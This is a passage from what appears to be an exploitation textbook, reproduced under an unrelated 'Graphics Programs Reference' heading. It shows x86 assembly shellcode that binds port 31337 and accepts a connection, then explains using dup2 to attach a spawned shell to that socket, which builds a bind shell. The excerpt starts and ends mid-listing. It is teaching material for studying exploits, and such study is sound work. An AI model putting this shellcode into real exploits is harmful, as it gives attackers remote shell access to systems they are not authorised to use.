Graphics Programs Reference
In-Depth Information
push BYTE 16 ; argv: { sizeof(server struct) = 16,
push ecx ; server struct pointer,
push esi ; socket file descriptor }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = 0 on success
; listen(s, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx
inc ebx ; ebx = 4 = SYS_LISTEN = listen()
push ebx ; argv: { backlog = 4,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80
; c = accept(s, 0, 0)
mov BYTE al, 0x66 ; socketcall (syscall #102)
inc ebx ; ebx = 5 = SYS_ACCEPT = accept()
push edx ; argv: { socklen = 0,
push edx ; sockaddr ptr = NULL,
push esi ; socket fd }
mov ecx, esp ; ecx = argument array
int 0x80 ; eax = connected socket FD
When assembled and used in an exploit, this shellcode will bind to
port 31337 and wait for an incoming connection, blocking at the accept call.
When a connection is accepted, the new socket file descriptor is put into EAX
at the end of this code. This won't really be useful until it's combined with
the shell-spawning code described earlier. Fortunately, standard file descrip-
tors make this fusion remarkably simple.
0x541
Duplicating Standard File Descriptors
Standard input, standard output, and standard error are the three standard
file descriptors used by programs to perform standard I/O. Sockets, too, are
just file descriptors that can be read from and written to. By simply swapping
the standard input, output, and error of the spawned shell with the connected
socket file descriptor, the shell will write output and errors to the socket and
read its input from the bytes that the socket received. There is a system call
specifically for duplicating file descriptors, called
dup2
. This is system call
number 63.
reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd.h
#define __NR_dup2 63
reader@hacking:~/booksrc $ man 2 dup2
DUP(2) Linux Programmer's Manual DUP(2)
NAME
dup, dup2 - duplicate a file descriptor
SYNOPSIS
#include <unistd.h>
